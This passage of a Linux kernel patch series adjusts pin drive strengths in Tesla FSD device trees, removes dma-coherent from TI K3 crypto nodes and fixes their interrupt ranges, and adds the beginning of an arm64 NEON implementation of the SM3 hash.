+ 		samsung,pin-pud = <FSD_PIN_PULL_UP>;
+-		samsung,pin-drv = <FSD_PIN_DRV_LV2>;
++		samsung,pin-drv = <FSD_PIN_DRV_LV4>;
+ 	};
+ 
+ 	pwm1_out: pwm1-out-pins {
+ 		samsung,pins = "gpb6-5";
+ 		samsung,pin-function = <FSD_PIN_FUNC_2>;
+ 		samsung,pin-pud = <FSD_PIN_PULL_UP>;
+-		samsung,pin-drv = <FSD_PIN_DRV_LV2>;
++		samsung,pin-drv = <FSD_PIN_DRV_LV4>;
+ 	};
+ 
+ 	hs_i2c0_bus: hs-i2c0-bus-pins {
+ 		samsung,pins = "gpb0-0", "gpb0-1";
+ 		samsung,pin-function = <FSD_PIN_FUNC_2>;
+ 		samsung,pin-pud = <FSD_PIN_PULL_UP>;
+-		samsung,pin-drv = <FSD_PIN_DRV_LV1>;
++		samsung,pin-drv = <FSD_PIN_DRV_LV4>;
+ 	};
+ 
+ 	hs_i2c1_bus: hs-i2c1-bus-pins {
+ 		samsung,pins = "gpb0-2", "gpb0-3";
+ 		samsung,pin-function = <FSD_PIN_FUNC_2>;
+ 		samsung,pin-pud = <FSD_PIN_PULL_UP>;
+-		samsung,pin-drv = <FSD_PIN_DRV_LV1>;
++		samsung,pin-drv = <FSD_PIN_DRV_LV4>;
+ 	};
+ 
+ 	hs_i2c2_bus: hs-i2c2-bus-pins {
+ 		samsung,pins = "gpb0-4", "gpb0-5";
+ 		samsung,pin-function = <FSD_PIN_FUNC_2>;
+ 		samsung,pin-pud = <FSD_PIN_PULL_UP>;
+-		samsung,pin-drv = <FSD_PIN_DRV_LV1>;
++		samsung,pin-drv = <FSD_PIN_DRV_LV4>;
+ 	};
+ 
+ 	hs_i2c3_bus: hs-i2c3-bus-pins {
+ 		samsung,pins = "gpb0-6", "gpb0-7";
+ 		samsung,pin-function = <FSD_PIN_FUNC_2>;
+ 		samsung,pin-pud = <FSD_PIN_PULL_UP>;
+-		samsung,pin-drv = <FSD_PIN_DRV_LV1>;
++		samsung,pin-drv = <FSD_PIN_DRV_LV4>;
+ 	};
+ 
+ 	hs_i2c4_bus: hs-i2c4-bus-pins {
+ 		samsung,pins = "gpb1-0", "gpb1-1";
+ 		samsung,pin-function = <FSD_PIN_FUNC_2>;
+ 		samsung,pin-pud = <FSD_PIN_PULL_UP>;
+-		samsung,pin-drv = <FSD_PIN_DRV_LV1>;
++		samsung,pin-drv = <FSD_PIN_DRV_LV4>;
+ 	};
+ 
+ 	hs_i2c5_bus: hs-i2c5-bus-pins {
+ 		samsung,pins = "gpb1-2", "gpb1-3";
+ 		samsung,pin-function = <FSD_PIN_FUNC_2>;
+ 		samsung,pin-pud = <FSD_PIN_PULL_UP>;
+-		samsung,pin-drv = <FSD_PIN_DRV_LV1>;
++		samsung,pin-drv = <FSD_PIN_DRV_LV4>;
+ 	};
+ 
+ 	hs_i2c6_bus: hs-i2c6-bus-pins {
+ 		samsung,pins = "gpb1-4", "gpb1-5";
+ 		samsung,pin-function = <FSD_PIN_FUNC_2>;
+ 		samsung,pin-pud = <FSD_PIN_PULL_UP>;
+-		samsung,pin-drv = <FSD_PIN_DRV_LV1>;
++		samsung,pin-drv = <FSD_PIN_DRV_LV4>;
+ 	};
+ 
+ 	hs_i2c7_bus: hs-i2c7-bus-pins {
+ 		samsung,pins = "gpb1-6", "gpb1-7";
+ 		samsung,pin-function = <FSD_PIN_FUNC_2>;
+ 		samsung,pin-pud = <FSD_PIN_PULL_UP>;
+-		samsung,pin-drv = <FSD_PIN_DRV_LV1>;
++		samsung,pin-drv = <FSD_PIN_DRV_LV4>;
+ 	};
+ 
+ 	uart0_data: uart0-data-pins {
+ 		samsung,pins = "gpb7-0", "gpb7-1";
+ 		samsung,pin-function = <FSD_PIN_FUNC_2>;
+ 		samsung,pin-pud = <FSD_PIN_PULL_NONE>;
+-		samsung,pin-drv = <FSD_PIN_DRV_LV1>;
++		samsung,pin-drv = <FSD_PIN_DRV_LV4>;
+ 	};
+ 
+ 	uart1_data: uart1-data-pins {
+ 		samsung,pins = "gpb7-4", "gpb7-5";
+ 		samsung,pin-function = <FSD_PIN_FUNC_2>;
+ 		samsung,pin-pud = <FSD_PIN_PULL_NONE>;
+-		samsung,pin-drv = <FSD_PIN_DRV_LV1>;
++		samsung,pin-drv = <FSD_PIN_DRV_LV4>;
+ 	};
+ 
+ 	spi0_bus: spi0-bus-pins {
+ 		samsung,pins = "gpb4-0", "gpb4-2", "gpb4-3";
+ 		samsung,pin-function = <FSD_PIN_FUNC_2>;
+ 		samsung,pin-pud = <FSD_PIN_PULL_UP>;
+-		samsung,pin-drv = <FSD_PIN_DRV_LV1>;
++		samsung,pin-drv = <FSD_PIN_DRV_LV4>;
+ 	};
+ 
+ 	spi1_bus: spi1-bus-pins {
+ 		samsung,pins = "gpb4-4", "gpb4-6", "gpb4-7";
+ 		samsung,pin-function = <FSD_PIN_FUNC_2>;
+ 		samsung,pin-pud = <FSD_PIN_PULL_UP>;
+-		samsung,pin-drv = <FSD_PIN_DRV_LV1>;
++		samsung,pin-drv = <FSD_PIN_DRV_LV4>;
+ 	};
+ 
+ 	spi2_bus: spi2-bus-pins {
+ 		samsung,pins = "gpb5-0", "gpb5-2", "gpb5-3";
+ 		samsung,pin-function = <FSD_PIN_FUNC_2>;
+ 		samsung,pin-pud = <FSD_PIN_PULL_UP>;
+-		samsung,pin-drv = <FSD_PIN_DRV_LV1>;
++		samsung,pin-drv = <FSD_PIN_DRV_LV4>;
+ 	};
+ };
+ 
+diff --git a/arch/arm64/boot/dts/tesla/fsd-pinctrl.h b/arch/arm64/boot/dts/tesla/fsd-pinctrl.h
+index 6ffbda3624930..c397d02208a08 100644
+--- a/arch/arm64/boot/dts/tesla/fsd-pinctrl.h
++++ b/arch/arm64/boot/dts/tesla/fsd-pinctrl.h
+@@ -16,9 +16,9 @@
+ #define FSD_PIN_PULL_UP			3
+ 
+ #define FSD_PIN_DRV_LV1			0
+-#define FSD_PIN_DRV_LV2			2
+-#define FSD_PIN_DRV_LV3			1
+-#define FSD_PIN_DRV_LV4			3
++#define FSD_PIN_DRV_LV2			1
++#define FSD_PIN_DRV_LV4			2
++#define FSD_PIN_DRV_LV6			3
+ 
+ #define FSD_PIN_FUNC_INPUT		0
+ #define FSD_PIN_FUNC_OUTPUT		1
+diff --git a/arch/arm64/boot/dts/ti/k3-am65-main.dtsi b/arch/arm64/boot/dts/ti/k3-am65-main.dtsi
+index 4005a73cfea99..ebb1c5ce7aece 100644
+--- a/arch/arm64/boot/dts/ti/k3-am65-main.dtsi
++++ b/arch/arm64/boot/dts/ti/k3-am65-main.dtsi
+@@ -120,7 +120,6 @@
+ 		dmas = <&main_udmap 0xc001>, <&main_udmap 0x4002>,
+ 				<&main_udmap 0x4003>;
+ 		dma-names = "tx", "rx1", "rx2";
+-		dma-coherent;
+ 
+ 		rng: rng@4e10000 {
+ 			compatible = "inside-secure,safexcel-eip76";
+diff --git a/arch/arm64/boot/dts/ti/k3-j7200-mcu-wakeup.dtsi b/arch/arm64/boot/dts/ti/k3-j7200-mcu-wakeup.dtsi
+index e5be78a58682d..d3fb86b2ea939 100644
+--- a/arch/arm64/boot/dts/ti/k3-j7200-mcu-wakeup.dtsi
++++ b/arch/arm64/boot/dts/ti/k3-j7200-mcu-wakeup.dtsi
+@@ -386,7 +386,6 @@
+ 		dmas = <&mcu_udmap 0xf501>, <&mcu_udmap 0x7502>,
+ 		       <&mcu_udmap 0x7503>;
+ 		dma-names = "tx", "rx1", "rx2";
+-		dma-coherent;
+ 
+ 		rng: rng@40910000 {
+ 			compatible = "inside-secure,safexcel-eip76";
+diff --git a/arch/arm64/boot/dts/ti/k3-j721e-main.dtsi b/arch/arm64/boot/dts/ti/k3-j721e-main.dtsi
+index 917c9dc99efaa..603ddda5127fa 100644
+--- a/arch/arm64/boot/dts/ti/k3-j721e-main.dtsi
++++ b/arch/arm64/boot/dts/ti/k3-j721e-main.dtsi
+@@ -337,7 +337,6 @@
+ 		dmas = <&main_udmap 0xc000>, <&main_udmap 0x4000>,
+ 				<&main_udmap 0x4001>;
+ 		dma-names = "tx", "rx1", "rx2";
+-		dma-coherent;
+ 
+ 		rng: rng@4e10000 {
+ 			compatible = "inside-secure,safexcel-eip76";
+diff --git a/arch/arm64/boot/dts/ti/k3-j721s2-main.dtsi b/arch/arm64/boot/dts/ti/k3-j721s2-main.dtsi
+index 34e7d577ae13b..c89f28235812a 100644
+--- a/arch/arm64/boot/dts/ti/k3-j721s2-main.dtsi
++++ b/arch/arm64/boot/dts/ti/k3-j721s2-main.dtsi
+@@ -60,7 +60,7 @@
+ 		#interrupt-cells = <1>;
+ 		ti,sci = <&sms>;
+ 		ti,sci-dev-id = <148>;
+-		ti,interrupt-ranges = <8 360 56>;
++		ti,interrupt-ranges = <8 392 56>;
+ 	};
+ 
+ 	main_pmx0: pinctrl@11c000 {
+diff --git a/arch/arm64/boot/dts/ti/k3-j721s2-mcu-wakeup.dtsi b/arch/arm64/boot/dts/ti/k3-j721s2-mcu-wakeup.dtsi
+index 4d1bfabd1313a..f0644851602cd 100644
+--- a/arch/arm64/boot/dts/ti/k3-j721s2-mcu-wakeup.dtsi
++++ b/arch/arm64/boot/dts/ti/k3-j721s2-mcu-wakeup.dtsi
+@@ -65,7 +65,7 @@
+ 		#interrupt-cells = <1>;
+ 		ti,sci = <&sms>;
+ 		ti,sci-dev-id = <125>;
+-		ti,interrupt-ranges = <16 928 16>;
++		ti,interrupt-ranges = <16 960 16>;
+ 	};
+ 
+ 	mcu_conf: syscon@40f00000 {
+diff --git a/arch/arm64/crypto/Kconfig b/arch/arm64/crypto/Kconfig
+index 8bd80508a710d..4b121dc0cfba2 100644
+--- a/arch/arm64/crypto/Kconfig
++++ b/arch/arm64/crypto/Kconfig
+@@ -96,6 +96,17 @@ config CRYPTO_SHA3_ARM64
+ 	  Architecture: arm64 using:
+ 	  - ARMv8.2 Crypto Extensions
+ 
++config CRYPTO_SM3_NEON
++	tristate "Hash functions: SM3 (NEON)"
++	depends on KERNEL_MODE_NEON
++	select CRYPTO_HASH
++	select CRYPTO_SM3
++	help
++	  SM3 (ShangMi 3) secure hash function (OSCCA GM/T 0004-2012)
++
++	  Architecture: arm64 using:
++	  - NEON (Advanced SIMD) extensions
++
+ config CRYPTO_SM3_ARM64_CE
+ 	tristate "Hash functions: SM3 (ARMv8.2 Crypto Extensions)"
+ 	depends on KERNEL_MODE_NEON
+diff --git a/arch/arm64/crypto/Makefile b/arch/arm64/crypto/Makefile
+index 24bb0c4610de2..087f1625e7751 100644
+--- a/arch/arm64/crypto/Makefile
++++ b/arch/arm64/crypto/Makefile
+@@ -17,6 +17,9 @@ sha512-ce-y := sha512-ce-glue.o sha512-ce-core.o
+ obj-$(CONFIG_CRYPTO_SHA3_ARM64) += sha3-ce.o
+ sha3-ce-y := sha3-ce-glue.o sha3-ce-core.o
+ 
++obj-$(CONFIG_CRYPTO_SM3_NEON) += sm3-neon.o
++sm3-neon-y := sm3-neon-glue.o sm3-neon-core.o
++
+ obj-$(CONFIG_CRYPTO_SM3_ARM64_CE) += sm3-ce.o
+ sm3-ce-y := sm3-ce-glue.o sm3-ce-core.o
+ 
+diff --git a/arch/arm64/crypto/sm3-neon-core.S b/arch/arm64/crypto/sm3-neon-core.S
+new file mode 100644
+index 0000000000000..4357e0e51be38
+--- /dev/null
++++ b/arch/arm64/crypto/sm3-neon-core.S
+@@ -0,0 +1,601 @@
++// SPDX-License-Identifier: GPL-2.0-or-later
++/*
++ * sm3-neon-core.S - SM3 secure hash using NEON instructions
++ *
++ * Linux/arm64 port of the libgcrypt SM3 implementation for AArch64
++ *
++ * Copyright (C) 2021 Jussi Kivilinna <jussi.kivilinna@iki.fi>
++ * Copyright (c) 2022 Tianjia Zhang <tianjia.zhang@linux.alibaba.com>
++ */
++
++#include <linux/linkage.h>
++#include <linux/cfi_types.h>
++#include <asm/assembler.h>
++
++/* Context structure */
++
++#define state_h0 0
++#define state_h1 4
++#define state_h2 8
++#define state_h3 12
++#define state_h4 16
++#define state_h5 20
++#define state_h6 24
++#define state_h7 28
++
++/* Stack structure */
++
++#define STACK_W_SIZE        (32 * 2 * 3)
++
++#define STACK_W             (0)
++#define STACK_SIZE          (STACK_W + STACK_W_SIZE)
++
++/* Register macros */
++
++#define RSTATE x0
++#define RDATA  x1
++#define RNBLKS x2
++#define RKPTR  x28
++#define RFRAME x29
++
++#define ra w3
++#define rb w4
++#define rc w5
++#define rd w6
++#define re w7
++#define rf w8
++#define rg w9
++#define rh w10
++
++#define t0 w11
++#define t1 w12
++#define t2 w13
++#define t3 w14
++#define t4 w15
++#define t5 w16
++#define t6 w17
++
++#define k_even w19
++#define k_odd w20
++
++#define addr0 x21
++#define addr1 x22
++
++#define s0 w23
++#define s1 w24
++#define s2 w25
++#define s3 w26
++
++#define W0 v0
++#define W1 v1
++#define W2 v2
++#define W3 v3
++#define W4 v4
++#define W5 v5
++
++#define XTMP0 v6
++#define XTMP1 v7
++#define XTMP2 v16
++#define XTMP3 v17
++#define XTMP4 v18
++#define XTMP5 v19
++#define XTMP6 v20
++
++/* Helper macros. */
++
++#define _(...) /*_*/
++
++#define clear_vec(x) \
++	movi	x.8h, #0;
++
++#define rolw(o, a, n) \
++	ror	o, a, #(32 - n);
++
++/* Round function macros. */
++
++#define GG1_1(x, y, z, o, t) \
++	eor	o, x, y;
++#define GG1_2(x, y, z, o, t) \
++	eor	o, o, z;
++#define GG1_3(x, y, z, o, t)
++
++#define FF1_1(x, y, z, o, t) GG1_1(x, y, z, o, t)
++#define FF1_2(x, y, z, o, t)
++#define FF1_3(x, y, z, o, t) GG1_2(x, y, z, o, t)
++
++#define GG2_1(x, y, z, o, t) \
++	bic	o, z, x;
++#define GG2_2(x, y, z, o, t) \
++	and	t, y, x;
++#define GG2_3(x, y, z, o, t) \
++	eor	o, o, t;
++
++#define FF2_1(x, y, z, o, t) \
++	eor	o, x, y;
++#define FF2_2(x, y, z, o, t) \
++	and	t, x, y; \
++	and	o, o, z;
++#define FF2_3(x, y, z, o, t) \
++	eor	o, o, t;
++
++#define R(i, a, b, c, d, e, f, g, h, k, K_LOAD, round, widx, wtype, IOP, iop_param) \
++	K_LOAD(round);                                                        \
++	ldr	t5, [sp, #(wtype##_W1_ADDR(round, widx))];                    \
++	rolw(t0, a, 12);                              /* rol(a, 12) => t0 */  \
++      IOP(1, iop_param);                                                      \
++	FF##i##_1(a, b, c, t1, t2);                                           \
++	ldr	t6, [sp, #(wtype##_W1W2_ADDR(round, widx))];                  \
++	add	k, k, e;                                                      \
++      IOP(2, iop_param);                                                      \
++	GG##i##_1(e, f, g, t3, t4);                                           \
++	FF##i##_2(a, b, c, t1, t2);                                           \
++      IOP(3, iop_param);                                                      \
++	add	k, k, t0;                                                     \
++	add	h, h, t5;                                                     \
++	add	d, d, t6;                     /* w1w2 + d => d */             \
++      IOP(4, iop_param);                                                      \
++	rolw(k, k, 7);                        /* rol (t0 + e + t), 7) => k */ \
++	GG##i##_2(e, f, g, t3, t4);                                           \
++	add	h, h, k;                      /* h + w1 + k => h */           \
++      IOP(5, iop_param);                                                      \
++	FF##i##_3(a, b, c, t1, t2);                                           \
++	eor	t0, t0, k;                    /* k ^ t0 => t0 */              \
++	GG##i##_3(e, f, g, t3, t4);                                           \
++	add	d, d, t1;                     /* FF(a,b,c) + d => d */        \
++      IOP(6, iop_param);                                                      \
++	add	t3, t3, h;                    /* GG(e,f,g) + h => t3 */       \
++	rolw(b, b, 9);                        /* rol(b, 9) => b */            \
++	eor	h, t3, t3, ror #(32-9);                                       \
++      IOP(7, iop_param);                                                      \
++	add	d, d, t0;                     /* t0 + d => d */               \
++	rolw(f, f, 19);                       /* rol(f, 19) => f */           \
++      IOP(8, iop_param);                                                      \
++	eor	h, h, t3, ror #(32-17);       /* P0(t3) => h */
++
++#define R1(a, b, c, d, e, f, g, h, k, K_LOAD, round, widx, wtype, IOP, iop_param) \
++	R(1, ##a, ##b, ##c, ##d, ##e, ##f, ##g, ##h, ##k, K_LOAD, round, widx, wtype, IOP, iop_param)
++
++#define R2(a, b, c, d, e, f, g, h, k, K_LOAD, round, widx, wtype, IOP, iop_param) \
++	R(2, ##a, ##b, ##c, ##d, ##e, ##f, ##g, ##h, ##k, K_LOAD, round, widx, wtype, IOP, iop_param)
++
++#define KL(round) \
++	ldp	k_even, k_odd, [RKPTR, #(4*(round))];
++
++/* Input expansion macros. */
++
++/* Byte-swapped input address. */
++#define IW_W_ADDR(round, widx, offs) \
++	(STACK_W + ((round) / 4) * 64 + (offs) + ((widx) * 4))
++
++/* Expanded input address. */
++#define XW_W_ADDR(round, widx, offs) \
++	(STACK_W + ((((round) / 3) - 4) % 2) * 64 + (offs) + ((widx) * 4))
++
++/* Rounds 1-12, byte-swapped input block addresses. */
++#define IW_W1_ADDR(round, widx)   IW_W_ADDR(round, widx, 32)
++#define IW_W1W2_ADDR(round, widx) IW_W_ADDR(round, widx, 48)
++
++/* Rounds 1-12, expanded input block addresses. */
++#define XW_W1_ADDR(round, widx)   XW_W_ADDR(round, widx, 0)
++#define XW_W1W2_ADDR(round, widx) XW_W_ADDR(round, widx, 16)
++
++/* Input block loading.
++ * Interleaving within round function needed for in-order CPUs. */
++#define LOAD_W_VEC_1_1() \
++	add	addr0, sp, #IW_W1_ADDR(0, 0);
++#define LOAD_W_VEC_1_2() \
++	add	addr1, sp, #IW_W1_ADDR(4, 0);
++#define LOAD_W_VEC_1_3() \
++	ld1	{W0.16b}, [RDATA], #16;
++#define LOAD_W_VEC_1_4() \
++	ld1	{W1.16b}, [RDATA], #16;
++#define LOAD_W_VEC_1_5() \
++	ld1	{W2.16b}, [RDATA], #16;
++#define LOAD_W_VEC_1_6() \
++	ld1	{W3.16b}, [RDATA], #16;
++#define LOAD_W_VEC_1_7() \
++	rev32	XTMP0.16b, W0.16b;
++#define LOAD_W_VEC_1_8() \
++	rev32	XTMP1.16b, W1.16b;
++#define LOAD_W_VEC_2_1() \
++	rev32	XTMP2.16b, W2.16b;
++#define LOAD_W_VEC_2_2() \
++	rev32	XTMP3.16b, W3.16b;
++#define LOAD_W_VEC_2_3() \
++	eor	XTMP4.16b, XTMP1.16b, XTMP0.16b;
++#define LOAD_W_VEC_2_4() \
++	eor	XTMP5.16b, XTMP2.16b, XTMP1.16b;
++#define LOAD_W_VEC_2_5() \
++	st1	{XTMP0.16b}, [addr0], #16;
++#define LOAD_W_VEC_2_6() \
++	st1	{XTMP4.16b}, [addr0]; \
++	add	addr0, sp, #IW_W1_ADDR(8, 0);
++#define LOAD_W_VEC_2_7() \
++	eor	XTMP6.16b, XTMP3.16b, XTMP2.16b;
++#define LOAD_W_VEC_2_8() \
++	ext	W0.16b, XTMP0.16b, XTMP0.16b, #8;  /* W0: xx, w0, xx, xx */
++#define LOAD_W_VEC_3_1() \
++	mov	W2.16b, XTMP1.16b;                 /* W2: xx, w6, w5, w4 */
++#define LOAD_W_VEC_3_2() \
++	st1	{XTMP1.16b}, [addr1], #16;
++#define LOAD_W_VEC_3_3() \
++	st1	{XTMP5.16b}, [addr1]; \
++	ext	W1.16b, XTMP0.16b, XTMP0.16b, #4;  /* W1: xx, w3, w2, w1 */
++#define LOAD_W_VEC_3_4() \
++	ext	W3.16b, XTMP1.16b, XTMP2.16b, #12; /* W3: xx, w9, w8, w7 */
++#define LOAD_W_VEC_3_5() \
++	ext	W4.16b, XTMP2.16b, XTMP3.16b, #8;  /* W4: xx, w12, w11, w10 */
++#define LOAD_W_VEC_3_6() \
++	st1	{XTMP2.16b}, [addr0], #16;
++#define LOAD_W_VEC_3_7() \
++	st1	{XTMP6.16b}, [addr0];
++#define LOAD_W_VEC_3_8() \
++	ext	W5.16b, XTMP3.16b, XTMP3.16b, #4;  /* W5: xx, w15, w14, w13 */
++
++#define LOAD_W_VEC_1(iop_num, ...) \
++	LOAD_W_VEC_1_##iop_num()
++#define LOAD_W_VEC_2(iop_num, ...) \
++	LOAD_W_VEC_2_##iop_num()
++#define LOAD_W_VEC_3(iop_num, ...) \
++	LOAD_W_VEC_3_##iop_num()
++
++/* Message scheduling. Note: 3 words per vector register.
++ * Interleaving within round function needed for in-order CPUs. */
++#define SCHED_W_1_1(round, w0, w1, w2, w3, w4, w5) \
++	/* Load (w[i - 16]) => XTMP0 */            \
++	/* Load (w[i - 13]) => XTMP5 */            \
++	ext	XTMP0.16b, w0.16b, w0.16b, #12;    /* XTMP0: w0, xx, xx, xx */
++#define SCHED_W_1_2(round, w0, w1, w2, w3, w4, w5) \
++	ext	XTMP5.16b, w1.16b, w1.16b, #12;
++#define SCHED_W_1_3(round, w0, w1, w2, w3, w4, w5) \
++	ext	XTMP0.16b, XTMP0.16b, w1.16b, #12; /* XTMP0: xx, w2, w1, w0 */
++#define SCHED_W_1_4(round, w0, w1, w2, w3, w4, w5) \
++	ext	XTMP5.16b, XTMP5.16b, w2.16b, #12;
++#define SCHED_W_1_5(round, w0, w1, w2, w3, w4, w5) \
++	/* w[i - 9] == w3 */                       \
++	/* W3 ^ XTMP0 => XTMP0 */                  \
++	eor	XTMP0.16b, XTMP0.16b, w3.16b;
++#define SCHED_W_1_6(round, w0, w1, w2, w3, w4, w5) \
++	/* w[i - 3] == w5 */                       \
++	/* rol(XMM5, 15) ^ XTMP0 => XTMP0 */       \
++	/* rol(XTMP5, 7) => XTMP1 */               \
++	add	addr0, sp, #XW_W1_ADDR((round), 0); \
++	shl	XTMP2.4s, w5.4s, #15;
++#define SCHED_W_1_7(round, w0, w1, w2, w3, w4, w5) \
++	shl	XTMP1.4s, XTMP5.4s, #7;
++#define SCHED_W_1_8(round, w0, w1, w2, w3, w4, w5) \
++	sri	XTMP2.4s, w5.4s, #(32-15);
++#define SCHED_W_2_1(round, w0, w1, w2, w3, w4, w5) \
++	sri	XTMP1.4s, XTMP5.4s, #(32-7);
++#define SCHED_W_2_2(round, w0, w1, w2, w3, w4, w5) \
++	eor	XTMP0.16b, XTMP0.16b, XTMP2.16b;
++#define SCHED_W_2_3(round, w0, w1, w2, w3, w4, w5) \
++	/* w[i - 6] == W4 */                       \
++	/* W4 ^ XTMP1 => XTMP1 */                  \
++	eor	XTMP1.16b, XTMP1.16b, w4.16b;
++#define SCHED_W_2_4(round, w0, w1, w2, w3, w4, w5) \
++	/* P1(XTMP0) ^ XTMP1 => W0 */              \
++	shl	XTMP3.4s, XTMP0.4s, #15;
++#define SCHED_W_2_5(round, w0, w1, w2, w3, w4, w5) \
++	shl	XTMP4.4s, XTMP0.4s, #23;
++#define SCHED_W_2_6(round, w0, w1, w2, w3, w4, w5) \
++	eor	w0.16b, XTMP1.16b, XTMP0.16b;
++#define SCHED_W_2_7(round, w0, w1, w2, w3, w4, w5) \
++	sri	XTMP3.4s, XTMP0.4s, #(32-15);
++#define SCHED_W_2_8(round, w0, w1, w2, w3, w4, w5) \
++	sri	XTMP4.4s, XTMP0.4s, #(32-23);
++#define SCHED_W_3_1(round, w0, w1, w2, w3, w4, w5) \
++	eor	w0.16b, w0.16b, XTMP3.16b;
++#define SCHED_W_3_2(round, w0, w1, w2, w3, w4, w5) \
++	/* Load (w[i - 3]) => XTMP2 */             \
++	ext	XTMP2.16b, w4.16b, w4.16b, #12;
++#define SCHED_W_3_3(round, w0, w1, w2, w3, w4, w5) \
++	eor	w0.16b, w0.16b, XTMP4.16b;
++#define SCHED_W_3_4(round, w0, w1, w2, w3, w4, w5) \
++	ext	XTMP2.16b, XTMP2.16b, w5.16b, #12;
++#define SCHED_W_3_5(round, w0, w1, w2, w3, w4, w5) \
++	/* W1 ^ W2 => XTMP3 */                     \
++	eor	XTMP3.16b, XTMP2.16b, w0.16b;
++#define SCHED_W_3_6(round, w0, w1, w2, w3, w4, w5)
++#define SCHED_W_3_7(round, w0, w1, w2, w3, w4, w5) \
++	st1	{XTMP2.16b-XTMP3.16b}, [addr0];
++#define SCHED_W_3_8(round, w0, w1, w2, w3, w4, w5)
++
++#define SCHED_W_W0W1W2W3W4W5_1(iop_num, round) \
++	SCHED_W_1_##iop_num(round, W0, W1, W2, W3, W4, W5)
++#define SCHED_W_W0W1W2W3W4W5_2(iop_num, round) \
++	SCHED_W_2_##iop_num(round, W0, W1, W2, W3, W4, W5)
++#define SCHED_W_W0W1W2W3W4W5_3(iop_num, round) \
++	SCHED_W_3_##iop_num(round, W0, W1, W2, W3, W4, W5)
++
++#define SCHED_W_W1W2W3W4W5W0_1(iop_num, round) \
++	SCHED_W_1_##iop_num(round, W1, W2, W3, W4, W5, W0)
++#define SCHED_W_W1W2W3W4W5W0_2(iop_num, round) \
++	SCHED_W_2_##iop_num(round, W1, W2, W3, W4, W5, W0)
++#define SCHED_W_W1W2W3W4W5W0_3(iop_num, round) \
++	SCHED_W_3_##iop_num(round, W1, W2, W3, W4, W5, W0)
++
++#define SCHED_W_W2W3W4W5W0W1_1(iop_num, round) \
++	SCHED_W_1_##iop_num(round, W2, W3, W4, W5, W0, W1)
++#define SCHED_W_W2W3W4W5W0W1_2(iop_num, round) \
++	SCHED_W_2_##iop_num(round, W2, W3, W4, W5, W0, W1)
++#define SCHED_W_W2W3W4W5W0W1_3(iop_num, round) \
++	SCHED_W_3_##iop_num(round, W2, W3, W4, W5, W0, W1)
++
++#define SCHED_W_W3W4W5W0W1W2_1(iop_num, round) \
++	SCHED_W_1_##iop_num(round, W3, W4, W5, W0, W1, W2)
++#define SCHED_W_W3W4W5W0W1W2_2(iop_num, round) \
++	SCHED_W_2_##iop_num(round, W3, W4, W5, W0, W1, W2)
++#define SCHED_W_W3W4W5W0W1W2_3(iop_num, round) \
++	SCHED_W_3_##iop_num(round, W3, W4, W5, W0, W1, W2)
++
++#define SCHED_W_W4W5W0W1W2W3_1(iop_num, round) \
++	SCHED_W_1_##iop_num(round, W4, W5, W0, W1, W2, W3)
++#define SCHED_W_W4W5W0W1W2W3_2(iop_num, round) \
++	SCHED_W_2_##iop_num(round, W4, W5, W0, W1, W2, W3)
++#define SCHED_W_W4W5W0W1W2W3_3(iop_num, round) \
++	SCHED_W_3_##iop_num(round, W4, W5, W0, W1, W2, W3)
++
++#define SCHED_W_W5W0W1W2W3W4_1(iop_num, round) \
++	SCHED_W_1_##iop_num(round, W5, W0, W1, W2, W3, W4)
++#define SCHED_W_W5W0W1W2W3W4_2(iop_num, round) \
++	SCHED_W_2_##iop_num(round, W5, W0, W1, W2, W3, W4)
++#define SCHED_W_W5W0W1W2W3W4_3(iop_num, round) \
++	SCHED_W_3_##iop_num(round, W5, W0, W1, W2, W3, W4)
++
++
++	/*
++	 * Transform blocks*64 bytes (blocks*16 32-bit words) at 'src'.
++	 *
++	 * void sm3_neon_transform(struct sm3_state *sst, u8 const *src,
++	 *                         int blocks)
++	 */
++	.text
++.align 3
++SYM_TYPED_FUNC_START(sm3_neon_transform)
++	ldp		ra, rb, [RSTATE, #0]
++	ldp		rc, rd, [RSTATE, #8]
++	ldp		re, rf, [RSTATE, #16]
++	ldp		rg, rh, [RSTATE, #24]
++
++	stp		x28, x29, [sp, #-16]!
++	stp		x19, x20, [sp, #-16]!
++	stp		x21, x22, [sp, #-16]!
++	stp		x23, x24, [sp, #-16]!
++	stp		x25, x26, [sp, #-16]!
++	mov		RFRAME, sp
++
++	sub		addr0, sp, #STACK_SIZE
++	adr_l		RKPTR, .LKtable
++	and		sp, addr0, #(~63)
++
++	/* Preload first block. */
++	LOAD_W_VEC_1(1, 0)
++	LOAD_W_VEC_1(2, 0)
++	LOAD_W_VEC_1(3, 0)
++	LOAD_W_VEC_1(4, 0)
++	LOAD_W_VEC_1(5, 0)
++	LOAD_W_VEC_1(6, 0)
++	LOAD_W_VEC_1(7, 0)
++	LOAD_W_VEC_1(8, 0)
++	LOAD_W_VEC_2(1, 0)
++	LOAD_W_VEC_2(2, 0)
++	LOAD_W_VEC_2(3, 0)
++	LOAD_W_VEC_2(4, 0)
++	LOAD_W_VEC_2(5, 0)
++	LOAD_W_VEC_2(6, 0)
++	LOAD_W_VEC_2(7, 0)
++	LOAD_W_VEC_2(8, 0)
++	LOAD_W_VEC_3(1, 0)
++	LOAD_W_VEC_3(2, 0)
++	LOAD_W_VEC_3(3, 0)
++	LOAD_W_VEC_3(4, 0)
++	LOAD_W_VEC_3(5, 0)
++	LOAD_W_VEC_3(6, 0)
++	LOAD_W_VEC_3(7, 0)
++	LOAD_W_VEC_3(8, 0)
++
++.balign 16
++.Loop:
++	/* Transform 0-3 */
++	R1(ra, rb, rc, rd, re, rf, rg, rh, k_even, KL, 0, 0, IW, _, 0)
++	R1(rd, ra, rb, rc, rh, re, rf, rg, k_odd,  _,  1, 1, IW, _, 0)
++	R1(rc, rd, ra, rb, rg, rh, re, rf, k_even, KL, 2, 2, IW, _, 0)
++	R1(rb, rc, rd, ra, rf, rg, rh, re, k_odd,  _,  3, 3, IW, _, 0)
++
++	/* Transform 4-7 + Precalc 12-14 */
++	R1(ra, rb, rc, rd, re, rf, rg, rh, k_even, KL, 4, 0, IW, _, 0)
++	R1(rd, ra, rb, rc, rh, re, rf, rg, k_odd,  _,  5, 1, IW, _, 0)
++	R1(rc, rd, ra, rb, rg, rh, re, rf, k_even, KL, 6, 2, IW, SCHED_W_W0W1W2W3W4W5_1, 12)
++	R1(rb, rc, rd, ra, rf, rg, rh, re, k_odd,  _,  7, 3, IW, SCHED_W_W0W1W2W3W4W5_2, 12)
++
++	/* Transform 8-11 + Precalc 12-17 */
++	R1(ra, rb, rc, rd, re, rf, rg, rh, k_even, KL, 8, 0, IW, SCHED_W_W0W1W2W3W4W5_3, 12)
